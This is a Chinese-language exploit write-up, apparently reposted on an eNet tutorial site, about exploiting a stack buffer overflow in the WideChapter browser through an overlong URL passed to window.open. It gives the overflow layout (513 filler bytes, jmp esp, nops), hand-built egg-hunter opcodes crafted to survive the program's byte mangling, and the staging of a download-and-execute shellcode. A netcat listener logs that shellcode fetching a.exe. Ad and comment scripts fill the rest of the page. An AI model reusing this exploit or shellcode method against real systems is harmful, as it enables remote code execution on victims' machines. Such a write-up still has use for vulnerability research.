E-Mail: never@safechina.net
Homepage: http://www.safechina.net
WideChapter存在缓冲溢出漏洞(http://www.cnns.net/article/db/3521.htm),这似乎是一个简单的栈溢出,但是利用上存在一点小小的困难。
按照描述,在 web 页面中嵌入以下 JavaScript 代码即可修改 EIP
<script>window.open("http://AAA..
先还是简单看看:构造了http://aaa..[513个]xxxx,用widechapter打开,呵呵,softice跳出来了。栈溢出还是比较简单的,看样子就是这个格式就可以了。
http://aaa..[513个] jmpesp nops shellcode
马上构造这种样子的html,我用的jeno的download execute的shellcode,本地nc -l -p 80,但是没有反应。很奇怪,马上用0xeb0xfe(jmp -1死循环)替换shellcode前面的nops,然后打开html,widechapter像死了一样,ctrl+d呼出softice一看,确实是在死循环,应该是跳到shellcode了的啊。嗯,再往下一看,shellcode变了。
看来这个串被拷贝之前是做了一些转换的。看了一下子,不是很清楚转换方法,大约是大写字母变成小写字母,0x80以上开始的word好像不变,f0以上开头的word会被转换,7f会被截掉(?)。这个地方应该不能放shellcode了,只好放一个找寻并跳转的东西。嗯,马上写一个找寻并跳转的code,当然要满足不能被改变,有点困难,9点钟开始写,成功的时候已经到了10点半了……如下。
"\xba\x55\x54\x54\x54"mov edx, 0x54545455
"\x4a"dec edx
"\x8b\xc4"mov eax, esp
"\x90"nop
"\x8b\x18"mov ebx, [eax]
"\x40\x40\x40\x40"inc eax ; x4
"\x3b\xda"cmp ebx, edx
"\x75\xf6"jne f6 ;jmp back
"\x40\x40\x40\x40\x40\x40\x40"inc eax ;x7
"\x90"nop
"\x89\x40\x04"mov [eax+4], eax
"\x54"push esp
"\xff\x60\x04";jmp [eax+4]
现在要构造的就是这样子的html了
<scripts>window.open("http://A x 513[jmpesp] [nops] [searchcode]")</scripts>[shellcode]
其中[shellcode]还要有点处理,先放上7个0x54(T),然后6个(?)90(nop),然后是一个eb0f(jmp 0f)然后是20来个90(nop),最后才是jeno的shellcode。之所以要有一个jmp 0f,是因为那个search的code中有mov [eax+4], eax,很讨厌,要跳过去。
然后我再测试,还是失败了……其实我觉得一点都没有错,怎么会失败呢,还是在search前面加上0xeb0xfe(jmp -1死循环),打开后ctrl+d,用s esp l ffffffff 54 54 54 54一搜,原来在找到真正的shellcode之前还有TTTT存在,选择了好久,终于选择到0xdadadada一定会搜索到我们的shellcode,赶快改掉,把0x54用0xda替换一下,当然,search里面的0x55也变成了0xdb。
还不是很放心,在search前面加上0x3bc074fc(cmp eax,eax & je -4),用widechapter打开,然后ctrl+d,停留在je -4上,用r把标志寄存器Z变一下,嗯,可以一步一步的调了。
先f7到jmp [eax+4],然后看看e eip的内容,果然到了我们的shellcode,f10下去,跳到了jeno的shellcode上面,呵呵,应该说成功了,g一下,那边nc -l -p 80的东东已经显示请求了~~
GET /a.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: 127.0.0.1
Connection: Keep-Alive
然后剩下的都是细节问题,这个exploit只有在第一次用widechapter打开的时候才有效,要通用的话还要稍微修改一下search,不过那已经是很简单的工作了。
【责任编辑 李旭海】
本栏目最新文章 |
|
Photoshop推荐教程 |
|
精彩回放 |
·用色彩叫醒你的眼睛 ·黑客 TCPIP协议教程 ·共享ADSL的原理和方法 ·用PS打造照片仙境效果 ·水晶水果设计艺术壁纸 ·Ps打造绚丽超酷海报效果 ·关闭端口防止病毒与黑客 ·5分钟做成一个ASP论坛 |
精彩推荐 |
<script language="JavaScript"> var elady_step=3; //1:small, 3:middle, 5:big var elady_speed=50; //20:fast, 50:middle, 80:slow var e_tp=new Array(); var e_tplink=new Array(); var adNum_elady1=0; e_tplink[0]="http://www.enet.com.cn/article/2005/0627/A20050627428510.shtml"; e_tp[0]="http://images.enet.com.cn/eschool/gdtup/tu1/865656.gif"; e_tplink[1]="http://www.enet.com.cn/eschool/zhuanti/upps/"; e_tp[1]="http://images.enet.com.cn/eschool/gdtup/tu1/psdfij145x110.jpg"; e_tplink[2]="http://www.enet.com.cn/article/2007/0213/A20070213441982.shtml"; e_tp[2]="http://images.enet.com.cn/eschool/gdtup/tu1/bbef145x110.jpg"; e_tplink[3]="http://www.enet.com.cn/article/2005/0217/A20050217390910.shtml"; e_tp[3]="http://images.enet.com.cn/eschool/gdtup/tu1/Photoshopdazhangia.gif"; var currentimage=new Array(); for (i=0;i<=3;i++){currentimage[i]=new Image(); currentimage[i].src=e_tp[i]; } function elady1_set(){ if (document.all) { e_tprotator.filters.revealTrans.Transition=Math.floor(Math.random()*23); e_tprotator.filters.revealTrans.apply(); } } function elady1_playCo() { if (document.all) e_tprotator.filters.revealTrans.play() }function elady1_nextAd(){ if(adNum_elady1 elady1_set(); document.images.e_tprotator.src=e_tp[adNum_elady1]; elady1_playCo(); theTimer=setTimeout("elady1_nextAd()", 4000);} function elady1_linkurl(){ jumpUrl=e_tplink[adNum_elady1]; jumpTarget='_blank'; if (jumpUrl != ''){ if (jumpTarget != '') window.open(jumpUrl,jumpTarget); else location.href=jumpUrl; }} document.write(""); </script> |
今日软件 |
·多协议开源即时通讯软件Pidgin ·解决误报问题 奇虎360安全卫士 ·系统维护清理工具完美卸载2007 ·用户界面友好的浏览工具腾讯TT ·即时聊天文件传送视频通信 ICQ |
今日头条 | ||||||||||
|
|
|
<script defer id="_comment_script_"> _comment_script_.src="http://comment.enet.com.cn/list.jsp?articleid=20040216286930&site=eschool"; </script> <iframe SRC='http://comment.enet.com.cn/commentform.jsp?articleid=20040216286930&site=eschool&url=http://www.enet.com.cn/article/2004/0216/A20040216286930.shtml&title=WideChapter缓冲溢出漏洞的利用' width=570 height=186 frameborder=no border=0 MARGINWIDTH=0 MARGINHEIGHT=0 align=center scrolling=no></iframe> |
<script type="text/javascript"> cpro_client='enet_1_cpr'; cpro_cbd='#trans'; cpro_cbg='#trans'; cpro_ctitle='#515151'; cpro_cdesc='#444444'; cpro_curl='#008000'; cpro_clink='#000000'; cpro_flush=2; cpro_w=580; cpro_h=90; cpro_template='text_noframe_580_90'; </script> <script language="JavaScript" type="text/javascript" src="http://cpro.baidu.com/cpro/ui/cp.js"></script> |
<script defer id="_comment_script_"> _comment_script_.src="http://comment.enet.com.cn/list.jsp?articleid=" + a_id +"&site=" + a_channel; </script> <script> document.write ("<iframe SRC='http://comment.enet.com.cn/commentform.jsp?articleid="+ a_id + "&site=" + a_channel +"&url="+a_path+"&title=" + a_title +"' width=615 height=186 frameborder=no border=0 MARGINWIDTH=0 MARGINHEIGHT=0 align=center scrolling=no></iframe>"); </script> |
<iframe width=750 height=120 frameborder=no border=0 MARGINWIDTH=0 MARGINHEIGHT=0 align=center scrolling=no src="/eschool/includes/public/endhtml.html"></iframe>
<iframe id=eshooltongdinei width=750 height=90 noresize scrolling=No frameborder=0 marginheight=0 marginwidth=0></iframe> |
|
eNet问吧 我是高手,我来回答 |
|
热点推荐 |
|
热点关注 |
|
往日推荐 |
|
校园快递 |
|
焦点关注 |
var m=3; var n=Math.floor(Math.random()*m+1) switch(n) { case 1: document.write('<iframe SRC=/eschool/includes/gdtup/tu6/title1.html frameborder=no border=0 MARGINWIDTH=0 MARGINHEIGHT=0 align=center width=170 height=140 scrolling=no noResize></iframe>'); break; case 2: document.write('<iframe SRC=/eschool/includes/gdtup/tu6/title2.html frameborder=no border=0 MARGINWIDTH=0 MARGINHEIGHT=0 align=center width=170 height=140 scrolling=no noResize></iframe>'); break; case 3: document.write('<iframe SRC=/eschool/includes/gdtup/tu6/title3.html frameborder=no border=0 MARGINWIDTH=0 MARGINHEIGHT=0 align=center width=170 height=140 scrolling=no noResize></iframe>'); break; } //add by lixuhai </script> |
<iframe width=210 height=240 noresize scrolling=No frameborder=0 marginheight=0 marginwidth=0 src="http://www.enet.com.cn/elady/includes/v1/d_school.shtml"></iframe>
<script language="javascript">
function _submitProblem(){
if(problemForm.problemcontent.value==null||problemForm.problemcontent.value==""){
alert("问题内容不可以为空!");
return;
}
problemForm.submit();
}
</script>
<script language="javascript" src="/includes/js/bottomsm.js"></script>
<script>
//通栏0--adv/tonglan1.htm
if(document.getElementById("tonglan0")) document.getElementById("tonglan0").src="http://www.enet.com.cn/enetshow.shtml?Pool=eschool";
if(document.getElementById("eschoollin")) document.getElementById("eschoollin").src="http://www.enet.com.cn/enetshow.shtml?Pool=eschoollin";
//通栏1--sub_top.htm
if(document.getElementById("tonglan1")) document.getElementById("tonglan1").src="http://www.enet.com.cn/enetshow.shtml?Pool=eschoolunder";
//通栏2--adv/tonglan2.htm
if(document.getElementById("tonglan2")) document.getElementById("tonglan2").src="http://www.enet.com.cn/enetshow.shtml?Pool=eschool2";
//通栏3--adv/tonglan3.htm
if(document.getElementById("tonglan3")) document.getElementById("tonglan3").src="http://www.enet.com.cn/enetshow.shtml?Pool=eschool3";
//通栏4--botton_home.htm
if(document.getElementById("eschool3")) document.getElementById("eschool3").src="http://www.enet.com.cn/enetshow.shtml?Pool=eschool3";
//首屏左侧BUTTON1--button11.htm
if(document.getElementById("button1")) document.getElementById("button1").src="http://www.enet.com.cn/enetshow.shtml?Pool=etechposter";
//首屏右侧BUTTON2--button5.htm
if(document.getElementById("eshoolbutton")) document.getElementById("eshoolbutton").src="http://www.enet.com.cn/enetshow.shtml?Pool=eshoolbutton";
if(document.getElementById("eschoolskynei1")) document.getElementById("eschoolskynei1").src="http://www.enet.com.cn/enetshow.shtml?Pool=eschoolskynei1";
if(document.getElementById("eschoolskynei2")) document.getElementById("eschoolskynei2").src="http://www.enet.com.cn/enetshow.shtml?Pool=eschoolskynei2";
if(document.getElementById("button3")) document.getElementById("button3").src="http://www.enet.com.cn/enetshow.shtml?Pool=eshoolbutton2";
if(document.getElementById("button4")) document.getElementById("button4").src="http://www.enet.com.cn/enetshow.shtml?Pool=eschoolbutton120";
if(document.getElementById("eschoolsky")) document.getElementById("eschoolsky").src="http://www.enet.com.cn/enetshow.shtml?Pool=eschoolsky";
if(document.getElementById("flash1")) document.getElementById("flash1").src="http://www.enet.com.cn/enetshow.shtml?Pool=eschoolflash";
if(document.getElementById("eschoolflashlin")) document.getElementById("eschoolflashlin").src="http://www.enet.com.cn/enetshow.shtml?Pool=eschoolflashlin";
//文章页banner
if(document.all.eschoolbanner)document.all.eschoolbanner.src="http://www.enet.com.cn/enetshow.shtml?Pool=eschoolbanner";
//if(document.all.eschoolbanner) document.all.eschoolbanner.src="/enews/includes/adv/banner2.html";
if(document.all.eshooltongdinei) document.all.eshooltongdinei.src="http://www.enet.com.cn/enetshow.shtml?Pool=eschool3";
//曝光加这
dTable="<iframe src='/eschool/includes/public/imglist.html' width='580 height='132' noresize scrolling='No' frameborder='0' marginheight='0' marginwidth='0'></iframe>";
//if(document.all.adv_under_cont) document.all.adv_under_cont.insertAdjacentHTML("AfterBegin",dTable);
</script>
<script language="JavaScript1.2">
publisher_id = 6235007045041206;
link_color = "#FF3366";
layer_background_color = "#FFFFFF";
_frame = 1;
layer_hover_color = "#FBF6FF";
title_text_color = "#9933FF";
ad_text_color = "#333333";
link_text_color = "#9933FF";
</script>
<script src="http://code.vogate.com/script/release/vogateADs2-enet.js"></script>